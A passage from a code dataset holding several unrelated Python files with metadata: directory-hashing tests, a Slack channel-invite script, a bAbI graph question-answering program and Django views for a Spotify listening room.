self.mkdirs('linked_dir')\n self.mkfile('linked_dir/f1')\n self.mkfile('linked_dir/f2')\n self.symlink('linked_dir', 'root/d1')\n\n filepaths = get_included_paths(self.path_to('root'), follow_links=False)\n assert filepaths == ['f1']\n\n filepaths = get_included_paths(self.path_to('root'), follow_links=True)\n assert filepaths == ['d1/f1', 'd1/f2', 'f1']\n\n # default is `follow_links=True`\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['d1/f1', 'd1/f2', 'f1']\n\n def test_raise_on_infinite_recursion(self):\n self.mkdirs('root/d1')\n self.symlink('root', 'root/d1/link_back')\n with pytest.raises(RecursionError) as exc_info:\n get_included_paths(self.path_to('root'), follow_links=True)\n assert exc_info.value.real_path == os.path.realpath(self.path_to('root'))\n assert exc_info.value.first_path == self.path_to('root/')\n assert exc_info.value.second_path == self.path_to('root/d1/link_back')\n assert str(exc_info.value).startswith('Symlink recursion:')\n\n def test_ignore_hidden_files(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/.f2')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/.f2')\n self.mkfile('root/.d2/f1')\n\n # no ignore\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['.d2/f1', '.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n # with ignore\n filepaths = get_included_paths(self.path_to('root'), match=['*', '!.*'])\n assert filepaths == ['.d2/f1', 'd1/f1', 'f1']\n\n def test_exclude_hidden_dirs(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/.f2')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/.f2')\n self.mkfile('root/.d2/f1')\n\n # no ignore\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['.d2/f1', '.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n # with ignore\n filepaths = get_included_paths(self.path_to('root'), match=['*', '!.*/'])\n assert filepaths == ['.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n def test_exclude_hidden_dirs_and_files(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n self.mkfile('root/f1')\n self.mkfile('root/.f2')\n self.mkfile('root/d1/f1')\n self.mkfile('root/d1/.f2')\n self.mkfile('root/.d2/f1')\n\n # no ignore\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['.d2/f1', '.f2', 'd1/.f2', 'd1/f1', 'f1']\n\n # using ignore\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*/', '!.*']\n )\n assert filepaths == ['d1/f1', 'f1']\n\n def test_exclude_extensions(self):\n self.mkdirs('root/d1')\n\n self.mkfile('root/f')\n self.mkfile('root/f.txt')\n self.mkfile('root/f.skip1')\n self.mkfile('root/fskip1')\n self.mkfile('root/f.skip2')\n self.mkfile('root/f.skip1.txt')\n self.mkfile('root/f.skip1.skip2')\n self.mkfile('root/f.skip1skip2')\n self.mkfile('root/d1/f.txt')\n self.mkfile('root/d1/f.skip1')\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!*.skip1', '!*.skip2']\n )\n assert filepaths == [\n 'd1/f.txt', 'f', 'f.skip1.txt', 'f.skip1skip2', 'f.txt', 'fskip1']\n\n def test_empty_dirs_include_vs_exclude(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/d2')\n self.mkdirs('root/d3/d31')\n self.mkdirs('root/d4/d41')\n\n self.mkfile('root/d1/f')\n self.mkfile('root/d3/d31/f')\n\n filepaths = get_included_paths(self.path_to('root'), include_empty=False)\n assert filepaths == ['d1/f', 'd3/d31/f']\n\n # `include_empty=False` is default\n filepaths = get_included_paths(self.path_to('root'))\n assert filepaths == ['d1/f', 'd3/d31/f']\n\n filepaths = get_included_paths(self.path_to('root'), include_empty=True)\n assert filepaths == ['d1/f', 'd2/.', 'd3/d31/f', 'd4/d41/.']\n\n def test_empty_dirs_because_of_filter_include_vs_exclude(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/d2')\n\n self.mkfile('root/d1/f')\n self.mkfile('root/d2/.f')\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n include_empty=False\n )\n assert filepaths == ['d1/f']\n\n # `include_empty=False` is default\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n )\n assert filepaths == ['d1/f']\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n include_empty=True\n )\n assert filepaths == ['d1/f', 'd2/.']\n\n def test_empty_dir_not_included_due_to_not_match(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/.d2')\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*'],\n include_empty=True\n )\n assert filepaths == ['d1/.']\n\n # NOTE that empty dirs are matched as is they were files (leafs!)\n # TODO better option?\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!.*/'],\n include_empty=True\n )\n assert filepaths == ['.d2/.', 'd1/.']\n\n filepaths = get_included_paths(\n self.path_to('root'),\n match=['*', '!d1/'],\n include_empty=True\n )\n assert filepaths == ['.d2/.', 'd1/.']\n\n\ndef dirhash_mp_comp(*args, **kwargs):\n res = dirhash(*args, **kwargs)\n res_mp = dirhash(workers=2, *args, **kwargs)\n assert res == res_mp\n return res\n\n\nclass Testdirhash(TempDirTest):\n\n def test_guaranteed_algorithms(self):\n self.mkdirs('root/d1/d11')\n self.mkdirs('root/d2')\n self.mkfile('root/f1', 'a')\n self.mkfile('root/d1/f1', 'b')\n self.mkfile('root/d1/d11/f1', 'c')\n self.mkfile('root/d2/f1', 'd')\n\n for algorithm, expected_hash in [\n ('md5', '23315916fc3a935b5ed3e120a202aea4'),\n ('sha1', '6119b22d2916a4af7032802cdb95c742a217fe9f'),\n ('sha224', 'cdb3a780741c08d6c4ffc6aa0725787f6fbef3e80d81c8850215ef61'),\n ('sha256', '6fa5594ea7fb6a05fd36c152e6576522'\n 'a5f37b07c2d797f2ed96527ae18f3fe3'),\n ('sha384', '453ebd36d95e24149f184589df49f69b'\n 'f289af3e889c916cc93f0e02367f4d48'\n 'aef2593ef29f0ecdf3b6e05572e90066'),\n ('sha512', 'f52ac9eeeb5160637afa91f1f20f1a60'\n 'ce80a55ac3757f8bb9225e10edc131b4'\n '2da10497706ef4f06d36f13dae77540b'\n 'c0e5484c7f79f87a83c76ae103fff4fa')\n ]:\n hash_value = dirhash_mp_comp(self.path_to('root'), algorithm)\n assert hash_value == expected_hash\n\n def test_symlinked_file(self):\n self.mkdirs('root1')\n self.mkfile('root1/f1', 'a')\n self.mkfile('linked_file', 'b')\n self.symlink('linked_file', 'root1/f2')\n\n self.mkdirs('root2')\n self.mkfile('root2/f1', 'a')\n self.mkfile('root2/f2', 'b')\n\n root1_follow_true = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=True)\n root1_follow_false = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=False)\n root2 = dirhash_mp_comp(\n self.path_to('root2'), algorithm='md5')\n\n # NOTE `follow_links` hash no effect if only the file is linked (as is the\n # case here), linked _files_ are always included.\n assert root1_follow_false == root1_follow_true == root2\n\n def test_symlinked_dir(self):\n self.mkdirs('root1')\n self.mkfile('root1/f1', 'a')\n self.mkdirs('linked_dir')\n self.mkfile('linked_dir/f1', 'b')\n self.mkfile('linked_dir/f2', 'c')\n self.symlink('linked_dir', 'root1/d1')\n\n self.mkdirs('root2')\n self.mkfile('root2/f1', 'a')\n self.mkdirs('root2/d1')\n self.mkfile('root2/d1/f1', 'b')\n self.mkfile('root2/d1/f2', 'c')\n\n root1_follow_true = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=True)\n root1_follow_false = dirhash_mp_comp(\n self.path_to('root1'), algorithm='md5', follow_links=False)\n root2 = dirhash_mp_comp(\n self.path_to('root2'), algorithm='md5')\n\n assert root1_follow_false != root1_follow_true\n assert root1_follow_true == root2\n\n def test_cache_used_for_symlinks(self):\n\n self.mkdirs('root/dir')\n self.mkfile('root/file', '< one chunk content')\n for i in range(10):\n self.symlink('root/file', 'root/link_{}'.format(i))\n for i in range(10):\n self.symlink('root/file', 'root/dir/link_{}'.format(i))\n start = time()\n dirhash(self.path_to('root'), algorithm=SlowHasher)\n end = time()\n elapsed = end - start\n assert elapsed < SlowHasher.wait_time * 2\n\n def test_raise_on_empty_root_without_include_empty(self):\n self.mkdirs('root')\n with pytest.raises(ValueError):\n dirhash_mp_comp(self.path_to('root'), 'sha256')\n\n def test_empty_root_include_empty(self):\n self.mkdirs('root')\n dirhash = dirhash_mp_comp(self.path_to('root'), 'sha256', include_empty=True)\n expected_dirhash = hashlib.sha256(\n _empty_dir_descriptor.encode('utf-8')\n ).hexdigest()\n assert dirhash == expected_dirhash\n\n def test_include_empty(self):\n self.mkdirs('root/d1')\n self.mkdirs('root/d2')\n self.mkfile('root/d1/f')\n\n args = (self.path_to('root'), 'sha256')\n dirhash = dirhash_mp_comp(*args, include_empty=False)\n dirhash_empty = dirhash_mp_comp(*args, include_empty=True)\n assert dirhash != dirhash_empty\n\n def test_chunksize(self):\n self.mkdirs('root')\n self.mkfile('root/numbers.txt', str(range(1000)))\n\n hash_value = dirhash_mp_comp(self.path_to('root'), 'sha256')\n for chunk_size in [2**4, 2**8, 2**16]:\n assert (\n dirhash_mp_comp(self.path_to('root'), 'sha256', chunk_size=chunk_size) ==\n hash_value\n )\n\n def test_content_only(self):\n self.mkdirs('root1')\n self.mkfile('root1/a.txt', 'abc')\n self.mkfile('root1/b.txt', 'def')\n self.mkdirs('root2')\n self.mkfile('root2/a.txt', 'abc')\n self.mkfile('root2/c.txt', 'def')\n\n hash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256')\n hash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256')\n assert hash1 != hash2\n\n # with `content_only` hash remains the same as long as order of files is the\n # same (based on sorting of file paths)\n chash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256', content_only=True)\n chash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256', content_only=True)\n assert chash1 == chash2\n\n def test_paths_only(self):\n self.mkdirs('root1')\n self.mkfile('root1/a.txt', 'abc')\n self.mkfile('root1/b.txt', 'def')\n self.mkdirs('root2')\n self.mkfile('root2/a.txt', 'abc')\n self.mkfile('root2/b.txt', '___')\n\n hash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256')\n hash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256')\n assert hash1 != hash2\n\n chash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256', paths_only=True)\n chash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256', paths_only=True)\n assert chash1 == chash2\n\n def test_raise_on_content_only_and_paths_only(self):\n self.mkdirs('root1')\n self.mkfile('root1/a.txt', 'abc')\n dirhash_mp_comp(self.path_to('root1'), 'sha256') # ok!\n with pytest.raises(ValueError):\n dirhash_mp_comp(\n self.path_to('root1'),\n 'sha256',\n content_only=True,\n paths_only=True\n )\n\n def test_collision_attempt(self):\n self.mkdirs('root1')\n self.mkfile('root1/ab')\n self.mkfile('root1/c')\n hash1 = dirhash_mp_comp(self.path_to('root1'), 'sha256')\n\n self.mkdirs('root2')\n self.mkfile('root2/a')\n self.mkfile('root2/bc')\n hash2 = dirhash_mp_comp(self.path_to('root2'), 'sha256')\n\n assert not hash1 == hash2\n\n def test_ignorefile(self):\n self.mkdirs('root1')\n self.mkdirs('root2')\n for fname in ['a', '.b', 'c.txt']:\n self.mkfile(os.path.join('root1', fname))\n self.mkfile(os.path.join('root2', fname))\n\n ignorefile = (\n '# my dirhash ignore patterns\\n'\n '.*\\n'\n )\n self.mkfile('root1/.dirhashignore', ignorefile)\n assert (\n dirhash_mp_comp(self.path_to('root1'), 'sha256') ==\n dirhash_mp_comp(self.path_to('root2'), 'sha256', ignore=['.*'])\n )\n assert (\n dirhash_mp_comp(self.path_to('root1'), 'sha256', ignore=['*.txt']) ==\n dirhash_mp_comp(self.path_to('root2'), 'sha256', ignore=['.*', '*.txt'])\n )\n # ignore file should _not_ be ignored by default:\n self.mkfile('root1/.dirhashignore', '# empty ignorefile')\n assert (\n dirhash_mp_comp(self.path_to('root1'), 'sha256') !=\n dirhash_mp_comp(self.path_to('root2'), 'sha256')\n )\n\n def test_multiproc_speedup(self):\n\n self.mkdirs('root/dir')\n num_files = 10\n for i in range(num_files):\n self.mkfile('root/file_{}'.format(i), '< one chunk content')\n\n expected_min_elapsed = SlowHasher.wait_time * num_files\n\n start = time()\n dirhash(self.path_to('root'), algorithm=SlowHasher)\n end = time()\n elapsed_sequential = end - start\n assert elapsed_sequential > expected_min_elapsed\n\n start = time()\n dirhash(self.path_to('root'), algorithm=SlowHasher, workers=num_files)\n end = time()\n elapsed_muliproc = end - start\n assert elapsed_muliproc < expected_min_elapsed / 2 # at least half!\n\n\nclass SlowHasher(object):\n wait_time = 0.1\n\n def __init__(self, *args, **kwargs):\n pass\n\n def update(self, data):\n if data != b'':\n sleep(self.wait_time)\n\n def hexdigest(self):\n return ''\n","sub_path":"tests/test_dirhash.py","file_name":"test_dirhash.py","file_ext":"py","file_size_in_byte":21124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"177963723","text":"#######################\n# Slack Tools\n# Invite all users from comma separated OLD_CHANNEL_IDS to comma separated NEW_CHANNEL_IDS\n# Preface a channel with p if it's a private channel, since these require different API methods\n# Written by Payam Azadi December 2019\n#######################\nimport os\nimport slack\nimport requests\nimport time\nfrom pprint import pprint\n\nSLACK_API_TOKEN = os.environ['SLACK_API_TOKEN'] # get one from https://api.slack.com/docs/oauth-test-tokens\nNEW_CHANNEL_IDS=\"C013JH95C77\"\nOLD_CHANNEL_IDS=\"CESJXA4MT\"\n\nclient = slack.WebClient(token=os.environ['SLACK_API_TOKEN'])\n\ndef inviteUsers(channel):\n\tif channel.startswith(\"p\"):\n\t\tchannel_info = client.conversations_members(channel=channel[1:], limit=200)\n\telse:\n\t\tchannel_info = client.channels_info(channel=channel,limit=200)[\"channel\"]\n\t\n\tfor member in channel_info[\"members\"]:\n\t\tfor newChannel in NEW_CHANNEL_IDS.split(\",\"):\n\t\t\tif(newChannel.startswith(\"p\")):\n\t\t\t\tresponse = requests.post('https://slack.com/api/conversations.invite?token=%s&users=%s&channel=%s' % (SLACK_API_TOKEN, member, newChannel[1:])).json()\n\t\t\telse:\n\t\t\t\tresponse = requests.post('https://slack.com/api/channels.invite?token=%s&user=%s&channel=%s' % (SLACK_API_TOKEN, member, newChannel)).json()\n\t\t\t\n\t\tpprint(response)\n\t\ttime.sleep(1)\n\nchannels = OLD_CHANNEL_IDS.split(\",\")\n\nfor channel in channels:\n\tinviteUsers(channel)\n","sub_path":"invite_users.py","file_name":"invite_users.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"619173503","text":"import networkx as nx\nimport collections\nimport json\nimport io\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport argparse, random\nfrom pycorenlp import StanfordCoreNLP\nfrom Globals import Globals\nfrom networkx.classes.function import neighbors\nfrom babiparser import BabiParser\nimport time\n# TODO: make this optional\nimport espeak\n#https://github.com/relsi/python-espeak\nfemale = espeak.ESpeak(amplitude=200, word_gap=-50, pitch=36, speed=220, voice='en-us')\nmale = espeak.ESpeak(amplitude=200, word_gap=-50, pitch=80, speed=220, voice='en-us+f4')\n\nclass ActionClassifier(object):\n\n def __init__(self, input_action, model=None):\n # Label -> set of Actions\n with open(input_action,'r') as annotatedActions:\n actions = json.load(annotatedActions)\n actionsDict = {}\n for actionClass in actions:\n actionsDict[actionClass] = set(actions[actionClass])\n self.model = model if model else actionsDict\n #{\n #'attach': set(['get', 'grab', 'pick', 'take']),\n #'detach': set(['discard', 'drop', 'leave', 'put']),\n #'transport': set(['go', 'journey', 'move', 'travel'])\n #}\n\n def classify(self, action):\n for label, terms in self.model.items():\n if action in terms:\n return label\n raise Exception(\"Haven't learnt this action : %s\" % action)\n\n def classes(self):\n return self.model.keys()\n\nclass BabiGraph(object):\n def __init__(self, interactive=False,\n save_graph=False,\n int_graph=False,\n interactive_delay = 0,\n corenlp=Globals.CORENLP_SERVER,\n input_action=\"\"):\n self.parser = BabiParser(corenlp)\n self.interactive = interactive\n self.interactive_delay = interactive_delay\n self.int_graph = int_graph\n self.subStoryFacts = {}\n self.G = nx.Graph()\n self.storyNum = 0\n self.action_clsfr = ActionClassifier(input_action)\n\n def subStoryCheck(self, fact):\n if (fact == 1):\n if self.interactive:\n print(\"*************************************************\")\n new_story = \"All right, Lets start with a new story\"\n male.say(new_story)\n print(new_story)\n self.storyNum += 1\n self.G.clear()\n self.subStoryFacts = {}\n\n def question(self, subStory):\n print(subStory)\n question = input(\"\\nPlease ask the question based on the above sub-story\"+\"\\n\")\n return question\n\n def analyzeQuestion(self, QDict):\n actorNode = QDict.get(\"POS_NNP\", \"actorNode\")\n objectLocationNode = QDict.get(\"POS_NN\", \"objectLocationNode\")\n if self.G.has_node(actorNode):\n return actorNode, True\n if self.G.has_node(objectLocationNode):\n return objectLocationNode, False\n # Not Found\n return None\n\n def getTemplateAns(self, subject, answer, ansType):\n if ansType == \"location\":\n templates = [subject + \" is in the \" + answer, subject + \" is at \" + answer ]\n index = random.randrange(len(templates))\n return templates[index]\n elif ansType == \"object\":\n templates = [subject + \" is at \" + answer, subject + \" is present in \" + answer]\n index = random.randrange(len(templates))\n return templates[index]\n else:\n return \"Something went wrong, I cant answer\"\n\n def find_recent_neighbor(self, node):\n # node exists\n if node in self.G:\n neighbors = self.G[node]\n rec_time = -1\n rec_neigh = None\n rec_action = None\n for neigh, edge_data in neighbors.items():\n n_time = max(edge_data.keys()) # keys has timestamp\n if n_time > rec_time:\n rec_time = n_time\n rec_neigh = neigh\n rec_action = edge_data[rec_time]\n assert rec_neigh is not None\n return rec_time, rec_action, rec_neigh\n else:\n raise Exception('%s not known' % str(node))\n\n def traverseGraph(self, node, QJsonObj, is_actor):\n # print(\"Args: \", node, QJsonObj, is_actor)\n subject = node\n reasons = {}\n if node not in self.G:\n if self.interactive:\n dont_know = \"Sorry, We are not aware of \" + node + \", Hence cant answer the question\"\n print(dont_know)\n female.say(dont_know)\n return None\n\n neigh = self.G.neighbors(node)\n oldest_mem_no = float('-inf') # oldest memory for search\n newest_mem_no = float('inf') # newest memory for search\n if not is_actor:\n # find recent actor and time\n ts, action, node = self.find_recent_neighbor(node)\n # print(\">>\", ts, action, node)\n a_type = self.action_clsfr.classify(action)\n if a_type == 'attach':\n #oldest_mem_no = ts\n pass\n elif a_type == 'detach':\n newest_mem_no = ts\n else:\n raise Exception(\"This shouldnt be happening!\")\n reasons[ts] = self.subStoryFacts[ts]\n # find recent neighbors of actor\n neigh = self.G.neighbors(node)\n\n lemmaDict = {}\n for neighborNode in neigh:\n uvEdge = (neighborNode, node)\n u = uvEdge[0]\n v = uvEdge[1]\n attributeDict = self.G.get_edge_data(u, v)\n for TS,Lemma in attributeDict.items():\n if Lemma in lemmaDict:\n lemmaDict[Lemma][TS] = neighborNode\n else:\n lemmaDict[Lemma] = {TS : neighborNode}\n\n # find location connecting edges\n location_edges = list(filter(lambda action: self.action_clsfr.classify(action) == 'transport', lemmaDict.keys()))\n candidates = {}\n for lemma in location_edges:\n edges = lemmaDict[lemma]\n for ts, node in edges.items():\n candidates[ts] = node\n timeStamps = candidates.keys()\n\n timeStamps = list(filter(lambda x: oldest_mem_no <= x <= newest_mem_no, timeStamps))\n if not timeStamps:\n print(\"ERROR: Insufficient data or wrong question\")\n return None\n if self.interactive:\n for ts in timeStamps:\n reasons[ts] = self.subStoryFacts[ts]\n recollect = \"We know that\"\n print(recollect)\n female.say(recollect)\n for i, ts in enumerate(sorted(reasons.keys())):\n if i != 0:\n print(\"and then\")\n female.say(\"and then\")\n reason = reasons[ts]\n print(\"%d %s\" % (ts, reason))\n female.say(reason)\n i += 1\n\n # print(\"Time Stamps :\", timeStamps)\n latestTimeStamp = max(timeStamps, key=int)\n answer = candidates[latestTimeStamp]\n concluded_answer = answer\n # convert answer to binary if expectation is yes no type\n if QJsonObj.get('expAnsType', '') == 'YESNO':\n answer = \"yes\" if answer == QJsonObj['POS_NN'] else \"no\"\n if self.interactive:\n print(\"Hence, we can infer that\")\n female.say(\"Hence, we can infer that\")\n template_ans = \"Dont Know\"\n if QJsonObj.get('expAnsType', '') == 'YESNO':\n respond = \"Yes\" if concluded_answer == QJsonObj['POS_NN'] else \"No\"\n person = QJsonObj.get('POS_NNP', 'SomeOne')\n location = QJsonObj.get('POS_NN', 'some where')\n if answer == \"no\":\n template_ans = respond + \", \" + person + \" is not in the \" + location\n else:\n template_ans = respond + \", \" + person + \" is in the \" + location\n else:\n subj_type = \"location\" if node == subject else \"object\"\n template_ans = self.getTemplateAns(subject, answer, subj_type)\n female.say(template_ans)\n print(template_ans)\n return (answer, QJsonObj, self.storyNum)\n\n def processQuestion(self, output, que):\n resultDict = {'Sentence': que}\n for sentence in output['sentences']:\n for tok in sentence['tokens']:\n originalText = tok['originalText']\n if(tok['pos'] == 'VBD' or tok['pos'] == 'VB' or tok['pos'] == 'VBG' or tok['pos'] == 'VBN'or tok['pos'] == 'VBP'or tok['pos'] == 'VBZ'):\n resultDict['POS_Verb'] = originalText\n resultDict['Lemma_Verb'] = tok['lemma']\n elif(tok['pos'] == 'NNP'):\n resultDict['POS_NNP'] = originalText\n elif(tok['pos'] == 'NN'):\n resultDict['POS_NN'] = originalText\n elif(tok['pos'] == 'WRB' or tok['pos']=='WP'):\n resultDict['WHQ'] = originalText\n return resultDict\n\n def displayGraph(self):\n if self.int_graph:\n plt.clf()\n pos = nx.spring_layout(self.G)\n nx.draw(self.G, pos, with_labels=True)\n nx.draw_networkx_edge_labels(self.G, pos)\n plt.show()\n time.sleep(self.interactive_delay)\n\n def update_story(self, ann_line):\n timestamp = ann_line['SNO']\n sentence = ann_line[\"Sentence\"]\n if self.interactive:\n print(\"\\t\\t\" + str(timestamp) + \" \" + sentence)\n male.say(sentence)\n node1 = ann_line[\"POS_NN\"]\n node2 = ann_line[\"POS_NNP\"]\n lemma = ann_line[\"Lemma_Verb\"]\n edgeAttribute = dict()\n edgeAttribute[timestamp] = lemma\n edge = (node1, node2, edgeAttribute)\n self.subStoryFacts[timestamp] = sentence\n self.G.add_node(node1) #,color='red',style='filled',fillcolor='blue',shape='square'\n self.G.add_node(node2)\n self.G.add_edge(node1, node2, edgeAttribute)\n\n def answer_question(self, ann_line):\n timestamp = ann_line[\"SNO\"]\n question = ann_line[\"Sentence\"]\n if self.interactive:\n prompt_msg = \"Do you want me to answer the question\"\n female.say(prompt_msg)\n print(question)\n female.say(question)\n choice = input(prompt_msg + \" (yes/no)\\n\")\n if choice == \"no\":\n ask_user_question = \"What other question would you like me to answer\"\n female.say(ask_user_question)\n question = input(ask_user_question + \"\\n\")\n lookup_response = \"Let me think\"\n print(lookup_response)\n female.say(lookup_response)\n annotated = self.parser.annotate(question)\n ann_line = self.processQuestion(annotated, question)\n\n #subject = ann_line[\"POS_NNP\"]\n QNode, is_actor = self.analyzeQuestion(ann_line)\n return self.traverseGraph(QNode, ann_line, is_actor)\n\n def play(self, in_file, out_file=None):\n with io.open(in_file) as data_file:\n for ann_line in map(json.loads, data_file):\n self.subStoryCheck(ann_line['SNO'])\n if ann_line[\"isFact\"]:\n self.update_story(ann_line)\n else:\n yield self.answer_question(ann_line)\n if self.interactive:\n prompt_msg = \"Do you want me to continue with some more facts\"\n male.say(prompt_msg)\n choice = input(prompt_msg + \"? (yes/no)\\n\")\n if choice == \"no\":\n break\n if self.interactive:\n self.displayGraph()\n\n def write_results(self, answers, out_file):\n count = 0\n with open(out_file, \"a+\") as fp:\n for ans, quest, story_num in answers:\n count += 1\n rec = \"%d\\t%s\" % (story_num, ans)\n if 'answer' in quest:\n rec += \"\\t%s\" % quest['answer']\n if 'supportingFactNos' in quest:\n rec += \"\\t%s\" % ','.join(map(str, quest['supportingFactNos']))\n fp.write(rec)\n fp.write(\"\\n\")\n print(\"Wrote %d records to %s\" % (count, out_file))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"construct graph from facts of a babi-task and answer questions\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"-i\", \"--interactive\", help=\"enable interactive user mode\", action=\"store_true\")\n parser.add_argument(\"-ig\", \"--graph\", help=\"enable interactive Graph\", action=\"store_true\")\n parser.add_argument(\"-in\", \"--input\", help=\"Input file\", default=Globals.NERTEXT_FILE)\n parser.add_argument(\"-ia\", \"--input_action\", help=\"Input file action annotated verbs\", default=Globals.ANNOTATE_ACTIONS)\n parser.add_argument(\"-o\", \"--out\", help=\"Output file\", default=Globals.RESULTS_FILE)\n\n args = parser.parse_args()\n bg = BabiGraph(args.interactive, int_graph=args.graph, input_action=args.input_action)\n results = bg.play(args.input)\n bg.write_results(results, args.out)\n","sub_path":"src/babigraph.py","file_name":"babigraph.py","file_ext":"py","file_size_in_byte":13362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"648934424","text":"from django.shortcuts import render, redirect\nfrom .secret import CLIENT_ID, CLIENT_SECRET, REDIRECT_URI\nfrom rest_framework.views import APIView\nfrom requests import Request, post\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom .util import * \nfrom api.models import Room\nfrom .models import Vote\nclass AuthURL(APIView):\n def get(self, request, format=None):\n scopes = 'user-read-playback-state user-modify-playback-state user-read-currently-playing'\n url = Request('GET', 'https://accounts.spotify.com/authorize', params={\n 'scope': scopes,\n 'response_type': 'code',\n 'redirect_uri': REDIRECT_URI,\n 'client_id': CLIENT_ID\n }).prepare().url\n\n return Response({\"url\": url}, status = status.HTTP_200_OK)\n\ndef spotifyCallBack(request, fromat = None):\n code = request.GET.get('code')\n err = request.GET.get('error')\n response = post('https://accounts.spotify.com/api/token', data={\n 'grant_type':'authorization_code',\n 'code': code,\n 'redirect_uri': REDIRECT_URI,\n 'client_id':CLIENT_ID,\n 'client_secret':CLIENT_SECRET\n\n }).json()\n\n access_token = response.get('access_token')\n token_type = response.get('token_type')\n refresh_token = response.get('refresh_token')\n expires_in = response.get('expires_in')\n error = response.get('error')\n if not request.session.exists(request.session.session_key):\n request.session.create()\n update_or_create_tokens(request.session.session_key, access_token, refresh_token, token_type, expires_in)\n return redirect('frontend:')\n\nclass IsAuthenticated(APIView):\n def get(self, request, format=None):\n is_authenticated = check_authentication(self.request.session.session_key)\n return Response({'status':is_authenticated},status=status.HTTP_200_OK)\n\nclass currentSong(APIView):\n def update_room_song(self, room, song_id):\n current_song = room.current_song\n if current_song != song_id:\n room.current_song = song_id\n room.save(update_fields = ['current_song'])\n Vote.objects.filter(room = room).delete()\n\n def get(self, request, format=None):\n roomCode = self.request.session.get('room-code')\n room = Room.objects.filter(code=roomCode)\n if len(room)>0:\n room = room[0]\n else:\n return Response({\"Error\": \"not in a room\"}, status=status.HTTP_404_NOT_FOUND)\n host = room.host\n endpoint = 'player/currently-playing'\n response = exexute_spotify_api_call(host, endpoint)\n if 'error' in response or 'item' not in response:\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n item = response.get('item')\n duration = item.get('duration_ms')\n progress = response.get('progress_ms')\n album_cover = item.get('album').get('images')[0].get('url')\n is_playing = response.get('is_playing')\n song_id = item.get('id')\n artists = \"\"\n\n for i, artist in enumerate(item.get('album').get('artists')):\n if i > 0:\n artists += \", \"\n name = artist.get('name')\n artists+=name\n votes = len(Vote.objects.filter(room = room, song_id=song_id))\n song = {\n 'title': item.get('name'),\n 'artist': artists,\n 'duration': duration,\n 'time': progress,\n 'img_url': album_cover,\n 'is_playing': is_playing,\n 'votes':votes,\n 'votes_needed': room.votes_to_skip,\n 'id': song_id\n }\n self.update_room_song(room, song_id)\n return Response(song, status=status.HTTP_200_OK)\n\nclass PauseSong(APIView):\n def put(self, request, format=None):\n room_code = self.request.session.get('room-code')\n room = Room.objects.filter(code=room_code)[0]\n if self.request.session.session_key == room.host or room.guest_can_pause:\n response = pause_song(room.host)\n if 'error' in response:\n return Response({'error': response['error']['message']}, status=status.HTTP_403_FORBIDDEN)\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response({}, status=status.HTTP_403_FORBIDDEN)\n\nclass PlaySong(APIView):\n def put(self, request, format=None):\n room_code = self.request.session.get('room-code')\n room = Room.objects.filter(code=room_code)[0]\n if self.request.session.session_key == room.host or room.guest_can_pause:\n response = play_song(room.host)\n if 'error' in response:\n return Response({'error': response['error']['message']}, status=status.HTTP_403_FORBIDDEN)\n return Response({}, status=status.HTTP_204_NO_CONTENT)\n return Response({}, status=status.HTTP_403_FORBIDDEN)\n\nclass SkipSong(APIView):\n def post(self, request, format= None):\n room_code= self.request.session.get('room-code')\n room = Room.objects.filter(code=room_code)[0]\n votes = Vote.objects.filter(room = room, song_id=room.current_song)\n votes_needed = room.votes_to_skip\n if self.request.session.session_key == room.host or len(votes)+1>=votes_needed:\n votes.delete()\n response = skip_song(room.host)\n if 'error' in response:\n return Response({'error': response['error']['message']}, status=status.HTTP_403_FORBIDDEN)\n else:\n vote = Vote(user=self.request.session.session_key, room = room , song_id= room.current_song)\n vote.save()\n\n return Response({}, status=status.HTTP_403_FORBIDDEN)","sub_path":"spotify/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"124586165","text":"#David Xiedeng\n#SoftDev1 